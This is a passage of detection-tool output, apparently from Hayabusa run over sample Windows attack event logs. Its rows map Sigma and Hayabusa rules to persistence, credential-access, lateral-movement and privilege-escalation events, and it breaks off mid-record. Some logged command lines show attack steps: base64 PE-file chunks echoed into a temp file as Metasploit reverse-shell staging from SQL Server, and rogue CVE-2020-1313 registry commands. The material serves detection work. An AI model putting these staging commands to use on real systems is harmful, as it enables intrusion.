Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group05 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.570 +00:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group05 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.572 +00:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group06 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.572 +00:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group06 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.574 +00:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group07 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 
05:19:54.574 +00:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group07 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.576 +00:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group08 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.576 +00:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group08 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.578 +00:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group09 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.578 +00:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group09 | LID: 
0x8084443,rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.580 +00:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group10 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.580 +00:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group10 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.582 +00:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group11 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.582 +00:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group11 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:27:05.579 +00:00,fs02.offsec.lan,4825,medium,LatMov,Denied Access To Remote 
Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx +2020-07-12 05:28:26.831 +00:00,fs02.offsec.lan,4825,medium,LatMov,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx +2020-07-12 06:01:13.758 +00:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1159 | Group: Domain Admins | LID: 0x80e25b9,rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx +2020-07-12 06:01:13.758 +00:00,rootdc1.offsec.lan,4728,high,Persis,User Added To Global Domain Admins Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1159 | Group: Domain Admins | LID: 0x80e25b9,rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup_DomainAdmins.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx +2020-07-12 19:45:00.670 +00:00,rootdc1.offsec.lan,4720,high,Persis,Hidden User Account Created! 
(Possible Backdoor),User: FAKE-COMPUTER$ | SID: S-1-5-21-4230534742-2542757381-3142984815-1168,rules/hayabusa/default/alerts/Security/4720_AccountCreated_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Fake computer account created.evtx +2020-07-12 19:45:00.670 +00:00,rootdc1.offsec.lan,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Fake computer account created.evtx +2020-07-13 08:34:13.253 +00:00,rootdc1.offsec.lan,4688,medium,CredAccess,Invocation of Active Directory Diagnostic Tool (ntdsutil.exe),,rules/sigma/process_creation_builtin/proc_creation_win_susp_ntdsutil.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4794-4688-DSRM password set with NTDSutil.evtx +2020-07-13 08:34:33.915 +00:00,rootdc1.offsec.lan,4794,high,Persis,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4794-4688-DSRM password set with NTDSutil.evtx +2020-07-19 13:06:52.199 +00:00,01566s-win16-ir.threebeesco.com,5145,critical,LatMov,Protected Storage Service Access,,rules/sigma/builtin/security/win_protected_storage_service_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_protectedstorage_5145_rpc_masterkey.evtx +2020-07-22 20:29:27.321 +00:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-22 20:29:36.414 +00:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos 
TGT Requested,User: HD01 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-22 20:29:36.414 +00:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: admin | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-22 20:29:36.414 +00:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: svc-02 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-22 20:29:36.414 +00:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: HD02 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-22 20:29:36.414 +00:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: svc-01 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-22 20:29:36.415 +00:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: bob | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: 
-,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-22 20:29:36.415 +00:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: admin02 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-22 20:29:36.434 +00:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: normal | Svc: krbtgt | IP Addr: 172.16.66.1 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-22 20:29:36.437 +00:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: normal | Svc: krbtgt | IP Addr: ::ffff:172.16.66.1 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-24 17:20:29.872 +00:00,LAPTOP-JU4M3I0E,10,high,,Process Access_Sysmon Alert,Credential Access - TeamViewer MemAccess | Src Process: C:\Users\bouss\AppData\Local\Temp\frida-b4f3ceb41e16327436594aec059ee5d5\frida-winjector-helper-32.exe | Tgt Process: C:\Program Files (x86)\TeamViewer\TeamViewer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x147a | Src PID: 18192 | Src PGUID: 00247C92-185D-5F1B-0000-0010667A1211 | Tgt PID: 2960 | Tgt PGUID: 00247C92-1562-5F1B-0000-0010318FFE10,rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_teamviewer-dumper_sysmon_10.evtx +2020-07-26 22:26:14.522 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7400 | Src PGUID: 747F3D96-FF9D-5F1D-0000-00100AC62400 | Tgt PID: 584 | Tgt PGUID: 747F3D96-F938-5F1D-0000-00104B500000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-07-26 22:26:14.523 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3660 | PGUID: 747F3D96-0306-5F1E-0000-0010E15F3100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-07-26 22:26:14.523 +00:00,MSEDGEWIN10,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation_sysmon/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-07-26 22:26:15.141 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49796 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 7400 | PGUID: 747F3D96-FF9D-5F1D-0000-00100AC62400,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-07-26 22:26:15.141 +00:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/net_connection_win_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-07-26 
22:26:15.141 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49796 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-F935-5F1D-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-07-30 14:06:52.015 +00:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\cmdLine: c:\windows\system32\cmd.exe | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx +2020-07-30 14:06:52.015 +00:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,"PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\startArg: /c ""whoami > c:\x.txt & whoami /priv >>c:\x.txt"" | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx +2020-07-30 14:06:52.015 +00:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,"PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\pauseArg: /c ""whoami > c:\x.txt & whoami /priv >>c:\x.txt"" | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 
00247C92-19D5-5F14-0000-001019F52000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx +2020-07-30 14:06:52.015 +00:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\queuedTime: QWORD (0x01d6667a-0xac806dc2) | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx +2020-08-01 22:58:09.443 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACTOPDW11mehddZnoXXWZ6FrEWShdNZnoVURZCF3lmehbhGlIXcWZ6FuEaahdRZnoXXWZ+FHlmehVRRw4XfWZ6Fg3quhf9ZnoUQX5iF1lmehVJpY2jXWZ6FAAAAAAAAAAAAAAAAAAAAAFBFAABMAQQALVO2SgAAAAAAAAAA4AAPAQsBBgAAsAAAAKAAAAAAAADmNAAAABAAAADAAAAAAEAAABAAAAAQAAAEAAAAAAAAAAQAAAAAAAAAAGABAAAQAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAbMcAAHgAAAAAUAEAyAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAODBAAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAADgAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAABmqQAAABAAAACwAAAAEAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAA5g8AAADAAAAAEAAAAMAAAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAAFxwAAAA0AAAAEAAAADQAAAAAAAAAAAAAAAAAABAAADALnJzcmMAAADIBwAAAFABAAAQAAAAEAEAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x414 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:09.443 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:09.443 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:09.445 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:09.721 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" 
/c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x8f4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:09.721 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL 
Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:09.721 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:09.723 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:09.995 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
